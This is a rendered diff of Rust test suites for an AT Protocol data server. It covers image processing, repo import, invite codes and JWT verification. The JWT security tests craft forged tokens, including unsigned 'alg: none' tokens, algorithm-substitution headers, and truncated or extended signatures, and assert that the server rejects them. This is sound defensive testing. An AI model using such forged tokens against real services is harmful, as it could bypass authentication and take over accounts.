assert!(result.thumbnail_full.is_none(), "Small image should not get full thumbnail"); 85 } 86 #[test] 87 fn test_webp_conversion() { 88 let processor = ImageProcessor::new().with_output_format(OutputFormat::WebP); ··· 90 let result = processor.process(&data, "image/png").unwrap(); 91 assert_eq!(result.original.mime_type, "image/webp"); 92 } 93 #[test] 94 fn test_jpeg_output_format() { 95 let processor = ImageProcessor::new().with_output_format(OutputFormat::Jpeg); ··· 97 let result = processor.process(&data, "image/png").unwrap(); 98 assert_eq!(result.original.mime_type, "image/jpeg"); 99 } 100 #[test] 101 fn test_png_output_format() { 102 let processor = ImageProcessor::new().with_output_format(OutputFormat::Png); ··· 104 let result = processor.process(&data, "image/jpeg").unwrap(); 105 assert_eq!(result.original.mime_type, "image/png"); 106 } 107 #[test] 108 fn test_max_dimension_enforced() { 109 let processor = ImageProcessor::new().with_max_dimension(1000); ··· 116 assert_eq!(max_dimension, 1000); 117 } 118 } 119 #[test] 120 fn test_file_size_limit() { 121 let processor = ImageProcessor::new().with_max_file_size(100); ··· 127 assert_eq!(max_size, 100); 128 } 129 } 130 #[test] 131 fn test_default_max_file_size() { 132 assert_eq!(DEFAULT_MAX_FILE_SIZE, 10 * 1024 * 1024); 133 } 134 #[test] 135 fn test_unsupported_format_rejected() { 136 let processor = ImageProcessor::new(); ··· 138 let result = processor.process(data, "application/octet-stream"); 139 assert!(matches!(result, Err(ImageError::UnsupportedFormat(_)))); 140 } 141 #[test] 142 fn test_corrupted_image_handling() { 143 let processor = ImageProcessor::new(); ··· 145 let result = processor.process(data, "image/png"); 146 assert!(matches!(result, Err(ImageError::DecodeError(_)))); 147 } 148 #[test] 149 fn test_aspect_ratio_preserved_landscape() { 150 let processor = ImageProcessor::new(); ··· 155 let thumb_ratio = thumb.width as f64 / thumb.height as f64; 156 assert!((original_ratio - thumb_ratio).abs() < 0.1, "Aspect ratio should be preserved"); 157 } 158 #[test] 159 fn test_aspect_ratio_preserved_portrait() { 160 let processor = ImageProcessor::new(); ··· 165 let thumb_ratio = thumb.width as f64 / thumb.height as f64; 166 assert!((original_ratio - thumb_ratio).abs() < 0.1, "Aspect ratio should be preserved"); 167 } 168 #[test] 169 fn test_mime_type_detection_auto() { 170 let processor = ImageProcessor::new(); ··· 172 let result = processor.process(&data, "application/octet-stream"); 173 assert!(result.is_ok(), "Should detect PNG format from data"); 174 } 175 #[test] 176 fn test_is_supported_mime_type() { 177 assert!(ImageProcessor::is_supported_mime_type("image/jpeg")); ··· 186 assert!(!ImageProcessor::is_supported_mime_type("text/plain")); 187 assert!(!ImageProcessor::is_supported_mime_type("application/json")); 188 } 189 #[test] 190 fn test_strip_exif() { 191 let data = create_test_jpeg(100, 100); ··· 194 let stripped = result.unwrap(); 195 assert!(!stripped.is_empty()); 196 } 197 #[test] 198 fn test_with_thumbnails_disabled() { 199 let processor = ImageProcessor::new().with_thumbnails(false); ··· 202 assert!(result.thumbnail_feed.is_none(), "Thumbnails should be disabled"); 203 assert!(result.thumbnail_full.is_none(), "Thumbnails should be disabled"); 204 } 205 #[test] 206 fn test_builder_chaining() { 207 let processor = ImageProcessor::new() ··· 213 let result = processor.process(&data, "image/png").unwrap(); 214 assert_eq!(result.original.mime_type, "image/jpeg"); 215 } 216 #[test] 217 fn test_processed_image_fields() { 218 let processor = ImageProcessor::new(); ··· 223 assert!(result.original.width > 0); 224 assert!(result.original.height > 0); 225 } 226 #[test] 227 fn test_only_feed_thumbnail_for_medium_images() { 228 let processor = ImageProcessor::new(); ··· 231 assert!(result.thumbnail_feed.is_some(), "Should have feed thumbnail"); 232 assert!(result.thumbnail_full.is_none(), "Should NOT have full thumbnail for 500px image"); 233 } 234 #[test] 235 fn test_both_thumbnails_for_large_images() { 236 let processor = ImageProcessor::new(); ··· 239 assert!(result.thumbnail_feed.is_some(), "Should have feed thumbnail"); 240 assert!(result.thumbnail_full.is_some(), "Should have full thumbnail for 2000px image"); 241 } 242 #[test] 243 fn test_exact_threshold_boundary_feed() { 244 let processor = ImageProcessor::new(); ··· 249 let result = processor.process(&above_threshold, "image/png").unwrap(); 250 assert!(result.thumbnail_feed.is_some(), "Above threshold should generate thumbnail"); 251 } 252 #[test] 253 fn test_exact_threshold_boundary_full() { 254 let processor = ImageProcessor::new();
··· 1 use bspds::image::{ImageProcessor, ImageError, OutputFormat, THUMB_SIZE_FEED, THUMB_SIZE_FULL, DEFAULT_MAX_FILE_SIZE}; 2 use image::{DynamicImage, ImageFormat}; 3 use std::io::Cursor; 4 + 5 fn create_test_png(width: u32, height: u32) -> Vec<u8> { 6 let img = DynamicImage::new_rgb8(width, height); 7 let mut buf = Vec::new(); 8 img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Png).unwrap(); 9 buf 10 } 11 + 12 fn create_test_jpeg(width: u32, height: u32) -> Vec<u8> { 13 let img = DynamicImage::new_rgb8(width, height); 14 let mut buf = Vec::new(); 15 img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Jpeg).unwrap(); 16 buf 17 } 18 + 19 fn create_test_gif(width: u32, height: u32) -> Vec<u8> { 20 let img = DynamicImage::new_rgb8(width, height); 21 let mut buf = Vec::new(); 22 img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Gif).unwrap(); 23 buf 24 } 25 + 26 fn create_test_webp(width: u32, height: u32) -> Vec<u8> { 27 let img = DynamicImage::new_rgb8(width, height); 28 let mut buf = Vec::new(); 29 img.write_to(&mut Cursor::new(&mut buf), ImageFormat::WebP).unwrap(); 30 buf 31 } 32 + 33 #[test] 34 fn test_process_png() { 35 let processor = ImageProcessor::new(); ··· 38 assert_eq!(result.original.width, 500); 39 assert_eq!(result.original.height, 500); 40 } 41 + 42 #[test] 43 fn test_process_jpeg() { 44 let processor = ImageProcessor::new(); ··· 47 assert_eq!(result.original.width, 400); 48 assert_eq!(result.original.height, 300); 49 } 50 + 51 #[test] 52 fn test_process_gif() { 53 let processor = ImageProcessor::new(); ··· 56 assert_eq!(result.original.width, 200); 57 assert_eq!(result.original.height, 200); 58 } 59 + 60 #[test] 61 fn test_process_webp() { 62 let processor = ImageProcessor::new(); ··· 65 assert_eq!(result.original.width, 300); 66 assert_eq!(result.original.height, 200); 67 } 68 + 69 #[test] 70 fn test_thumbnail_feed_size() { 71 let processor = ImageProcessor::new(); ··· 75 assert!(thumb.width <= THUMB_SIZE_FEED); 76 assert!(thumb.height <= THUMB_SIZE_FEED); 77 } 78 + 79 #[test] 80 fn test_thumbnail_full_size() { 81 let processor = ImageProcessor::new(); ··· 85 assert!(thumb.width <= THUMB_SIZE_FULL); 86 assert!(thumb.height <= THUMB_SIZE_FULL); 87 } 88 + 89 #[test] 90 fn test_no_thumbnail_small_image() { 91 let processor = ImageProcessor::new(); ··· 94 assert!(result.thumbnail_feed.is_none(), "Small image should not get feed thumbnail"); 95 assert!(result.thumbnail_full.is_none(), "Small image should not get full thumbnail"); 96 } 97 + 98 #[test] 99 fn test_webp_conversion() { 100 let processor = ImageProcessor::new().with_output_format(OutputFormat::WebP); ··· 102 let result = processor.process(&data, "image/png").unwrap(); 103 assert_eq!(result.original.mime_type, "image/webp"); 104 } 105 + 106 #[test] 107 fn test_jpeg_output_format() { 108 let processor = ImageProcessor::new().with_output_format(OutputFormat::Jpeg); ··· 110 let result = processor.process(&data, "image/png").unwrap(); 111 assert_eq!(result.original.mime_type, "image/jpeg"); 112 } 113 + 114 #[test] 115 fn test_png_output_format() { 116 let processor = ImageProcessor::new().with_output_format(OutputFormat::Png); ··· 118 let result = processor.process(&data, "image/jpeg").unwrap(); 119 assert_eq!(result.original.mime_type, "image/png"); 120 } 121 + 122 #[test] 123 fn test_max_dimension_enforced() { 124 let processor = ImageProcessor::new().with_max_dimension(1000); ··· 131 assert_eq!(max_dimension, 1000); 132 } 133 } 134 + 135 #[test] 136 fn test_file_size_limit() { 137 let processor = ImageProcessor::new().with_max_file_size(100); ··· 143 assert_eq!(max_size, 100); 144 } 145 } 146 + 147 #[test] 148 fn test_default_max_file_size() { 149 assert_eq!(DEFAULT_MAX_FILE_SIZE, 10 * 1024 * 1024); 150 } 151 + 152 #[test] 153 fn test_unsupported_format_rejected() { 154 let processor = ImageProcessor::new(); ··· 156 let result = processor.process(data, "application/octet-stream"); 157 assert!(matches!(result, Err(ImageError::UnsupportedFormat(_)))); 158 } 159 + 160 #[test] 161 fn test_corrupted_image_handling() { 162 let processor = ImageProcessor::new(); ··· 164 let result = processor.process(data, "image/png"); 165 assert!(matches!(result, Err(ImageError::DecodeError(_)))); 166 } 167 + 168 #[test] 169 fn test_aspect_ratio_preserved_landscape() { 170 let processor = ImageProcessor::new(); ··· 175 let thumb_ratio = thumb.width as f64 / thumb.height as f64; 176 assert!((original_ratio - thumb_ratio).abs() < 0.1, "Aspect ratio should be preserved"); 177 } 178 + 179 #[test] 180 fn test_aspect_ratio_preserved_portrait() { 181 let processor = ImageProcessor::new(); ··· 186 let thumb_ratio = thumb.width as f64 / thumb.height as f64; 187 assert!((original_ratio - thumb_ratio).abs() < 0.1, "Aspect ratio should be preserved"); 188 } 189 + 190 #[test] 191 fn test_mime_type_detection_auto() { 192 let processor = ImageProcessor::new(); ··· 194 let result = processor.process(&data, "application/octet-stream"); 195 assert!(result.is_ok(), "Should detect PNG format from data"); 196 } 197 + 198 #[test] 199 fn test_is_supported_mime_type() { 200 assert!(ImageProcessor::is_supported_mime_type("image/jpeg")); ··· 209 assert!(!ImageProcessor::is_supported_mime_type("text/plain")); 210 assert!(!ImageProcessor::is_supported_mime_type("application/json")); 211 } 212 + 213 #[test] 214 fn test_strip_exif() { 215 let data = create_test_jpeg(100, 100); ··· 218 let stripped = result.unwrap(); 219 assert!(!stripped.is_empty()); 220 } 221 + 222 #[test] 223 fn test_with_thumbnails_disabled() { 224 let processor = ImageProcessor::new().with_thumbnails(false); ··· 227 assert!(result.thumbnail_feed.is_none(), "Thumbnails should be disabled"); 228 assert!(result.thumbnail_full.is_none(), "Thumbnails should be disabled"); 229 } 230 + 231 #[test] 232 fn test_builder_chaining() { 233 let processor = ImageProcessor::new() ··· 239 let result = processor.process(&data, "image/png").unwrap(); 240 assert_eq!(result.original.mime_type, "image/jpeg"); 241 } 242 + 243 #[test] 244 fn test_processed_image_fields() { 245 let processor = ImageProcessor::new(); ··· 250 assert!(result.original.width > 0); 251 assert!(result.original.height > 0); 252 } 253 + 254 #[test] 255 fn test_only_feed_thumbnail_for_medium_images() { 256 let processor = ImageProcessor::new(); ··· 259 assert!(result.thumbnail_feed.is_some(), "Should have feed thumbnail"); 260 assert!(result.thumbnail_full.is_none(), "Should NOT have full thumbnail for 500px image"); 261 } 262 + 263 #[test] 264 fn test_both_thumbnails_for_large_images() { 265 let processor = ImageProcessor::new(); ··· 268 assert!(result.thumbnail_feed.is_some(), "Should have feed thumbnail"); 269 assert!(result.thumbnail_full.is_some(), "Should have full thumbnail for 2000px image"); 270 } 271 + 272 #[test] 273 fn test_exact_threshold_boundary_feed() { 274 let processor = ImageProcessor::new(); ··· 279 let result = processor.process(&above_threshold, "image/png").unwrap(); 280 assert!(result.thumbnail_feed.is_some(), "Above threshold should generate thumbnail"); 281 } 282 + 283 #[test] 284 fn test_exact_threshold_boundary_full() { 285 let processor = ImageProcessor::new();
+11
tests/import_verification.rs
··· 3 use iroh_car::CarHeader; 4 use reqwest::StatusCode; 5 use serde_json::json; 6 #[tokio::test] 7 async fn test_import_repo_requires_auth() { 8 let client = client(); ··· 15 .expect("Request failed"); 16 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 17 } 18 #[tokio::test] 19 async fn test_import_repo_invalid_car() { 20 let client = client(); ··· 31 let body: serde_json::Value = res.json().await.unwrap(); 32 assert_eq!(body["error"], "InvalidRequest"); 33 } 34 #[tokio::test] 35 async fn test_import_repo_empty_body() { 36 let client = client(); ··· 45 .expect("Request failed"); 46 assert_eq!(res.status(), StatusCode::BAD_REQUEST); 47 } 48 fn write_varint(buf: &mut Vec<u8>, mut value: u64) { 49 loop { 50 let mut byte = (value & 0x7F) as u8; ··· 58 } 59 } 60 } 61 #[tokio::test] 62 async fn test_import_rejects_car_for_different_user() { 63 let client = client(); ··· 90 body 91 ); 92 } 93 #[tokio::test] 94 async fn test_import_accepts_own_exported_repo() { 95 let client = client(); ··· 135 .expect("Failed to import repo"); 136 assert_eq!(import_res.status(), StatusCode::OK); 137 } 138 #[tokio::test] 139 async fn test_import_repo_size_limit() { 140 let client = client(); ··· 165 } 166 } 167 } 168 #[tokio::test] 169 async fn test_import_deactivated_account_rejected() { 170 let client = client(); ··· 205 import_res.status() 206 ); 207 } 208 #[tokio::test] 209 async fn test_import_invalid_car_structure() { 210 let client = client(); ··· 220 .expect("Request failed"); 221 assert_eq!(res.status(), StatusCode::BAD_REQUEST); 222 } 223 #[tokio::test] 224 async fn test_import_car_with_no_roots() { 225 let client = client(); ··· 241 let body: serde_json::Value = res.json().await.unwrap(); 242 assert_eq!(body["error"], "InvalidRequest"); 243 } 244 #[tokio::test] 245 async fn test_import_preserves_records_after_reimport() { 246 let client = client();
··· 3 use iroh_car::CarHeader; 4 use reqwest::StatusCode; 5 use serde_json::json; 6 + 7 #[tokio::test] 8 async fn test_import_repo_requires_auth() { 9 let client = client(); ··· 16 .expect("Request failed"); 17 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 18 } 19 + 20 #[tokio::test] 21 async fn test_import_repo_invalid_car() { 22 let client = client(); ··· 33 let body: serde_json::Value = res.json().await.unwrap(); 34 assert_eq!(body["error"], "InvalidRequest"); 35 } 36 + 37 #[tokio::test] 38 async fn test_import_repo_empty_body() { 39 let client = client(); ··· 48 .expect("Request failed"); 49 assert_eq!(res.status(), StatusCode::BAD_REQUEST); 50 } 51 + 52 fn write_varint(buf: &mut Vec<u8>, mut value: u64) { 53 loop { 54 let mut byte = (value & 0x7F) as u8; ··· 62 } 63 } 64 } 65 + 66 #[tokio::test] 67 async fn test_import_rejects_car_for_different_user() { 68 let client = client(); ··· 95 body 96 ); 97 } 98 + 99 #[tokio::test] 100 async fn test_import_accepts_own_exported_repo() { 101 let client = client(); ··· 141 .expect("Failed to import repo"); 142 assert_eq!(import_res.status(), StatusCode::OK); 143 } 144 + 145 #[tokio::test] 146 async fn test_import_repo_size_limit() { 147 let client = client(); ··· 172 } 173 } 174 } 175 + 176 #[tokio::test] 177 async fn test_import_deactivated_account_rejected() { 178 let client = client(); ··· 213 import_res.status() 214 ); 215 } 216 + 217 #[tokio::test] 218 async fn test_import_invalid_car_structure() { 219 let client = client(); ··· 229 .expect("Request failed"); 230 assert_eq!(res.status(), StatusCode::BAD_REQUEST); 231 } 232 + 233 #[tokio::test] 234 async fn test_import_car_with_no_roots() { 235 let client = client(); ··· 251 let body: serde_json::Value = res.json().await.unwrap(); 252 assert_eq!(body["error"], "InvalidRequest"); 253 } 254 + 255 #[tokio::test] 256 async fn test_import_preserves_records_after_reimport() { 257 let client = client();
+8
tests/import_with_verification.rs
··· 11 use std::collections::BTreeMap; 12 use wiremock::matchers::{method, path}; 13 use wiremock::{Mock, MockServer, ResponseTemplate}; 14 fn make_cid(data: &[u8]) -> Cid { 15 let mut hasher = Sha256::new(); 16 hasher.update(data); ··· 18 let multihash = multihash::Multihash::wrap(0x12, &hash).unwrap(); 19 Cid::new_v1(0x71, multihash) 20 } 21 fn write_varint(buf: &mut Vec<u8>, mut value: u64) { 22 loop { 23 let mut byte = (value & 0x7F) as u8; ··· 31 } 32 } 33 } 34 fn encode_car_block(cid: &Cid, data: &[u8]) -> Vec<u8> { 35 let cid_bytes = cid.to_bytes(); 36 let mut result = Vec::new(); ··· 39 result.extend_from_slice(data); 40 result 41 } 42 fn get_multikey_from_signing_key(signing_key: &SigningKey) -> String { 43 let public_key = signing_key.verifying_key(); 44 let compressed = public_key.to_sec1_bytes(); ··· 55 buf.extend_from_slice(&compressed); 56 multibase::encode(multibase::Base::Base58Btc, buf) 57 } 58 fn create_did_document(did: &str, handle: &str, signing_key: &SigningKey, pds_endpoint: &str) -> serde_json::Value { 59 let multikey = get_multikey_from_signing_key(signing_key); 60 json!({ ··· 77 }] 78 }) 79 } 80 fn create_signed_commit( 81 did: &str, 82 data_cid: &Cid, ··· 106 let cid = make_cid(&signed_bytes); 107 (signed_bytes, cid) 108 } 109 fn create_mst_node(entries: Vec<(String, Cid)>) -> (Vec<u8>, Cid) { 110 let ipld_entries: Vec<Ipld> = entries 111 .into_iter() ··· 124 let cid = make_cid(&bytes); 125 (bytes, cid) 126 } 127 fn create_record() -> (Vec<u8>, Cid) { 128 let record = Ipld::Map(BTreeMap::from([ 129 ("$type".to_string(), Ipld::String("app.bsky.feed.post".to_string())),
··· 11 use std::collections::BTreeMap; 12 use wiremock::matchers::{method, path}; 13 use wiremock::{Mock, MockServer, ResponseTemplate}; 14 + 15 fn make_cid(data: &[u8]) -> Cid { 16 let mut hasher = Sha256::new(); 17 hasher.update(data); ··· 19 let multihash = multihash::Multihash::wrap(0x12, &hash).unwrap(); 20 Cid::new_v1(0x71, multihash) 21 } 22 + 23 fn write_varint(buf: &mut Vec<u8>, mut value: u64) { 24 loop { 25 let mut byte = (value & 0x7F) as u8; ··· 33 } 34 } 35 } 36 + 37 fn encode_car_block(cid: &Cid, data: &[u8]) -> Vec<u8> { 38 let cid_bytes = cid.to_bytes(); 39 let mut result = Vec::new(); ··· 42 result.extend_from_slice(data); 43 result 44 } 45 + 46 fn get_multikey_from_signing_key(signing_key: &SigningKey) -> String { 47 let public_key = signing_key.verifying_key(); 48 let compressed = public_key.to_sec1_bytes(); ··· 59 buf.extend_from_slice(&compressed); 60 multibase::encode(multibase::Base::Base58Btc, buf) 61 } 62 + 63 fn create_did_document(did: &str, handle: &str, signing_key: &SigningKey, pds_endpoint: &str) -> serde_json::Value { 64 let multikey = get_multikey_from_signing_key(signing_key); 65 json!({ ··· 82 }] 83 }) 84 } 85 + 86 fn create_signed_commit( 87 did: &str, 88 data_cid: &Cid, ··· 112 let cid = make_cid(&signed_bytes); 113 (signed_bytes, cid) 114 } 115 + 116 fn create_mst_node(entries: Vec<(String, Cid)>) -> (Vec<u8>, Cid) { 117 let ipld_entries: Vec<Ipld> = entries 118 .into_iter() ··· 131 let cid = make_cid(&bytes); 132 (bytes, cid) 133 } 134 + 135 fn create_record() -> (Vec<u8>, Cid) { 136 let record = Ipld::Map(BTreeMap::from([ 137 ("$type".to_string(), Ipld::String("app.bsky.feed.post".to_string())),
+10
tests/invite.rs
··· 2 use common::*; 3 use reqwest::StatusCode; 4 use serde_json::{Value, json}; 5 #[tokio::test] 6 async fn test_create_invite_code_success() { 7 let client = client(); ··· 26 assert!(!code.is_empty()); 27 assert!(code.contains('-'), "Code should be a UUID format"); 28 } 29 #[tokio::test] 30 async fn test_create_invite_code_no_auth() { 31 let client = client(); ··· 45 let body: Value = res.json().await.expect("Response was not valid JSON"); 46 assert_eq!(body["error"], "AuthenticationRequired"); 47 } 48 #[tokio::test] 49 async fn test_create_invite_code_invalid_use_count() { 50 let client = client(); ··· 66 let body: Value = res.json().await.expect("Response was not valid JSON"); 67 assert_eq!(body["error"], "InvalidRequest"); 68 } 69 #[tokio::test] 70 async fn test_create_invite_code_for_another_account() { 71 let client = client(); ··· 89 let body: Value = res.json().await.expect("Response was not valid JSON"); 90 assert!(body["code"].is_string()); 91 } 92 #[tokio::test] 93 async fn test_create_invite_codes_success() { 94 let client = client(); ··· 114 assert_eq!(codes.len(), 1); 115 assert_eq!(codes[0]["codes"].as_array().unwrap().len(), 3); 116 } 117 #[tokio::test] 118 async fn test_create_invite_codes_for_multiple_accounts() { 119 let client = client(); ··· 143 assert_eq!(code_obj["codes"].as_array().unwrap().len(), 2); 144 } 145 } 146 #[tokio::test] 147 async fn test_create_invite_codes_no_auth() { 148 let client = client(); ··· 160 .expect("Failed to send request"); 161 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 162 } 163 #[tokio::test] 164 async fn test_get_account_invite_codes_success() { 165 let client = client(); ··· 198 assert!(code["createdAt"].is_string()); 199 assert!(code["uses"].is_array()); 200 } 201 #[tokio::test] 202 async fn test_get_account_invite_codes_no_auth() { 203 let client = client(); ··· 211 .expect("Failed to send request"); 212 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 213 } 214 #[tokio::test] 215 async fn test_get_account_invite_codes_include_used_filter() { 216 let client = client();
··· 2 use common::*; 3 use reqwest::StatusCode; 4 use serde_json::{Value, json}; 5 + 6 #[tokio::test] 7 async fn test_create_invite_code_success() { 8 let client = client(); ··· 27 assert!(!code.is_empty()); 28 assert!(code.contains('-'), "Code should be a UUID format"); 29 } 30 + 31 #[tokio::test] 32 async fn test_create_invite_code_no_auth() { 33 let client = client(); ··· 47 let body: Value = res.json().await.expect("Response was not valid JSON"); 48 assert_eq!(body["error"], "AuthenticationRequired"); 49 } 50 + 51 #[tokio::test] 52 async fn test_create_invite_code_invalid_use_count() { 53 let client = client(); ··· 69 let body: Value = res.json().await.expect("Response was not valid JSON"); 70 assert_eq!(body["error"], "InvalidRequest"); 71 } 72 + 73 #[tokio::test] 74 async fn test_create_invite_code_for_another_account() { 75 let client = client(); ··· 93 let body: Value = res.json().await.expect("Response was not valid JSON"); 94 assert!(body["code"].is_string()); 95 } 96 + 97 #[tokio::test] 98 async fn test_create_invite_codes_success() { 99 let client = client(); ··· 119 assert_eq!(codes.len(), 1); 120 assert_eq!(codes[0]["codes"].as_array().unwrap().len(), 3); 121 } 122 + 123 #[tokio::test] 124 async fn test_create_invite_codes_for_multiple_accounts() { 125 let client = client(); ··· 149 assert_eq!(code_obj["codes"].as_array().unwrap().len(), 2); 150 } 151 } 152 + 153 #[tokio::test] 154 async fn test_create_invite_codes_no_auth() { 155 let client = client(); ··· 167 .expect("Failed to send request"); 168 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 169 } 170 + 171 #[tokio::test] 172 async fn test_get_account_invite_codes_success() { 173 let client = client(); ··· 206 assert!(code["createdAt"].is_string()); 207 assert!(code["uses"].is_array()); 208 } 209 + 210 #[tokio::test] 211 async fn test_get_account_invite_codes_no_auth() { 212 let client = client(); ··· 220 .expect("Failed to send request"); 221 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 222 } 223 + 224 #[tokio::test] 225 async fn test_get_account_invite_codes_include_used_filter() { 226 let client = client();
+43
tests/jwt_security.rs
··· 15 use reqwest::StatusCode; 16 use serde_json::{json, Value}; 17 use sha2::{Digest, Sha256}; 18 fn generate_user_key() -> Vec<u8> { 19 let secret_key = SecretKey::random(&mut OsRng); 20 secret_key.to_bytes().to_vec() 21 } 22 fn create_custom_jwt(header: &Value, claims: &Value, key_bytes: &[u8]) -> String { 23 let signing_key = SigningKey::from_slice(key_bytes).expect("valid key"); 24 let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(header).unwrap()); ··· 28 let signature_b64 = URL_SAFE_NO_PAD.encode(signature.to_bytes()); 29 format!("{}.{}", message, signature_b64) 30 } 31 fn create_unsigned_jwt(header: &Value, claims: &Value) -> String { 32 let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(header).unwrap()); 33 let claims_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(claims).unwrap()); 34 format!("{}.{}.", header_b64, claims_b64) 35 } 36 #[test] 37 fn test_jwt_security_forged_signature_rejected() { 38 let key_bytes = generate_user_key(); ··· 46 let err_msg = result.err().unwrap().to_string(); 47 assert!(err_msg.contains("signature") || err_msg.contains("Signature"), "Error should mention signature: {}", err_msg); 48 } 49 #[test] 50 fn test_jwt_security_modified_payload_rejected() { 51 let key_bytes = generate_user_key(); ··· 60 let result = verify_access_token(&modified_token, &key_bytes); 61 assert!(result.is_err(), "Modified payload must be rejected"); 62 } 63 #[test] 64 fn test_jwt_security_algorithm_none_attack_rejected() { 65 let key_bytes = generate_user_key(); ··· 81 let result = verify_access_token(&malicious_token, &key_bytes); 82 assert!(result.is_err(), "Algorithm 'none' attack must be rejected"); 83 } 84 #[test] 85 fn test_jwt_security_algorithm_substitution_hs256_rejected() { 86 let key_bytes = generate_user_key(); ··· 111 let result = verify_access_token(&malicious_token, &key_bytes); 112 assert!(result.is_err(), "HS256 algorithm substitution must be rejected"); 113 } 114 #[test] 115 fn test_jwt_security_algorithm_substitution_rs256_rejected() { 116 let key_bytes = generate_user_key(); ··· 135 let result = verify_access_token(&malicious_token, &key_bytes); 136 assert!(result.is_err(), "RS256 algorithm substitution must be rejected"); 137 } 138 #[test] 139 fn test_jwt_security_algorithm_substitution_es256_rejected() { 140 let key_bytes = generate_user_key(); ··· 159 let result = verify_access_token(&malicious_token, &key_bytes); 160 assert!(result.is_err(), "ES256 (P-256) algorithm substitution must be rejected (we use ES256K/secp256k1)"); 161 } 162 #[test] 163 fn test_jwt_security_token_type_confusion_refresh_as_access() { 164 let key_bytes = generate_user_key(); ··· 169 let err_msg = result.err().unwrap().to_string(); 170 assert!(err_msg.contains("Invalid token type"), "Error: {}", err_msg); 171 } 172 #[test] 173 fn test_jwt_security_token_type_confusion_access_as_refresh() { 174 let key_bytes = generate_user_key(); ··· 179 let err_msg = result.err().unwrap().to_string(); 180 assert!(err_msg.contains("Invalid token type"), "Error: {}", err_msg); 181 } 182 #[test] 183 fn test_jwt_security_token_type_confusion_service_as_access() { 184 let key_bytes = generate_user_key(); ··· 188 let result = verify_access_token(&service_token, &key_bytes); 189 assert!(result.is_err(), "Service token must not be accepted as access token"); 190 } 191 #[test] 192 fn test_jwt_security_scope_manipulation_attack() { 193 let key_bytes = generate_user_key(); ··· 211 let err_msg = result.err().unwrap().to_string(); 212 assert!(err_msg.contains("Invalid token scope"), "Error: {}", err_msg); 213 } 214 #[test] 215 fn test_jwt_security_empty_scope_rejected() { 216 let key_bytes = generate_user_key(); ··· 232 let result = verify_access_token(&token, &key_bytes); 233 assert!(result.is_err(), "Empty scope must be rejected for access tokens"); 234 } 235 #[test] 236 fn test_jwt_security_missing_scope_rejected() { 237 let key_bytes = generate_user_key(); ··· 252 let result = verify_access_token(&token, &key_bytes); 253 assert!(result.is_err(), "Missing scope must be rejected for access tokens"); 254 } 255 #[test] 256 fn test_jwt_security_expired_token_rejected() { 257 let key_bytes = generate_user_key(); ··· 275 let err_msg = result.err().unwrap().to_string(); 276 assert!(err_msg.contains("expired"), "Error: {}", err_msg); 277 } 278 #[test] 279 fn test_jwt_security_future_iat_accepted() { 280 let key_bytes = generate_user_key(); ··· 296 let result = verify_access_token(&token, &key_bytes); 297 assert!(result.is_ok(), "Slight future iat should be accepted for clock skew tolerance"); 298 } 299 #[test] 300 fn test_jwt_security_cross_user_key_attack() { 301 let key_bytes_user1 = generate_user_key(); ··· 305 let result = verify_access_token(&token, &key_bytes_user2); 306 assert!(result.is_err(), "Token signed by user1's key must not verify with user2's key"); 307 } 308 #[test] 309 fn test_jwt_security_signature_truncation_rejected() { 310 let key_bytes = generate_user_key(); ··· 317 let result = verify_access_token(&truncated_token, &key_bytes); 318 assert!(result.is_err(), "Truncated signature must be rejected"); 319 } 320 #[test] 321 fn test_jwt_security_signature_extension_rejected() { 322 let key_bytes = generate_user_key(); ··· 330 let result = verify_access_token(&extended_token, &key_bytes); 331 assert!(result.is_err(), "Extended signature must be rejected"); 332 } 333 #[test] 334 fn test_jwt_security_malformed_tokens_rejected() { 335 let key_bytes = generate_user_key(); ··· 352 if token.len() > 40 { &token[..40] } else { token }); 353 } 354 } 355 #[test] 356 fn test_jwt_security_missing_required_claims_rejected() { 357 let key_bytes = generate_user_key(); ··· 389 assert!(result.is_err(), "Token missing '{}' claim must be rejected", missing_claim); 390 } 391 } 392 #[test] 393 fn test_jwt_security_invalid_header_json_rejected() { 394 let key_bytes = generate_user_key(); ··· 399 let result = verify_access_token(&malicious_token, &key_bytes); 400 assert!(result.is_err(), "Invalid header JSON must be rejected"); 401 } 402 #[test] 403 fn test_jwt_security_invalid_claims_json_rejected() { 404 let key_bytes = generate_user_key(); ··· 409 let result = verify_access_token(&malicious_token, &key_bytes); 410 assert!(result.is_err(), "Invalid claims JSON must be rejected"); 411 } 412 #[test] 413 fn test_jwt_security_header_injection_attack() { 414 let key_bytes = generate_user_key(); ··· 432 let result = verify_access_token(&token, &key_bytes); 433 assert!(result.is_ok(), "Extra header fields should not cause issues (we ignore them)"); 434 } 435 #[test] 436 fn test_jwt_security_claims_type_confusion() { 437 let key_bytes = generate_user_key(); ··· 452 let result = verify_access_token(&token, &key_bytes); 453 assert!(result.is_err(), "Claims with wrong types must be rejected"); 454 } 455 #[test] 456 fn test_jwt_security_unicode_injection_in_claims() { 457 let key_bytes = generate_user_key(); ··· 475 assert!(!data.claims.sub.contains('\0'), "Null bytes in claims should be sanitized or rejected"); 476 } 477 } 478 #[test] 479 fn test_jwt_security_signature_verification_is_constant_time() { 480 let key_bytes = generate_user_key(); ··· 491 let _result2 = verify_access_token(&completely_invalid_token, &key_bytes); 492 assert!(true, "Signature verification should use constant-time comparison (timing attack prevention)"); 493 } 494 #[test] 495 fn test_jwt_security_valid_scopes_accepted() { 496 let key_bytes = generate_user_key(); ··· 519 assert!(result.is_ok(), "Valid scope '{}' should be accepted", scope); 520 } 521 } 522 #[test] 523 fn test_jwt_security_refresh_token_scope_rejected_as_access() { 524 let key_bytes = generate_user_key(); ··· 540 let result = verify_access_token(&token, &key_bytes); 541 assert!(result.is_err(), "Refresh scope with access token type must be rejected"); 542 } 543 #[test] 544 fn test_jwt_security_get_did_extraction_safe() { 545 let key_bytes = generate_user_key(); ··· 557 let extracted_unsafe = get_did_from_token(&unverified_token).expect("extract unsafe"); 558 assert_eq!(extracted_unsafe, "did:plc:sub", "get_did_from_token extracts sub without verification (by design for lookup)"); 559 } 560 #[test] 561 fn 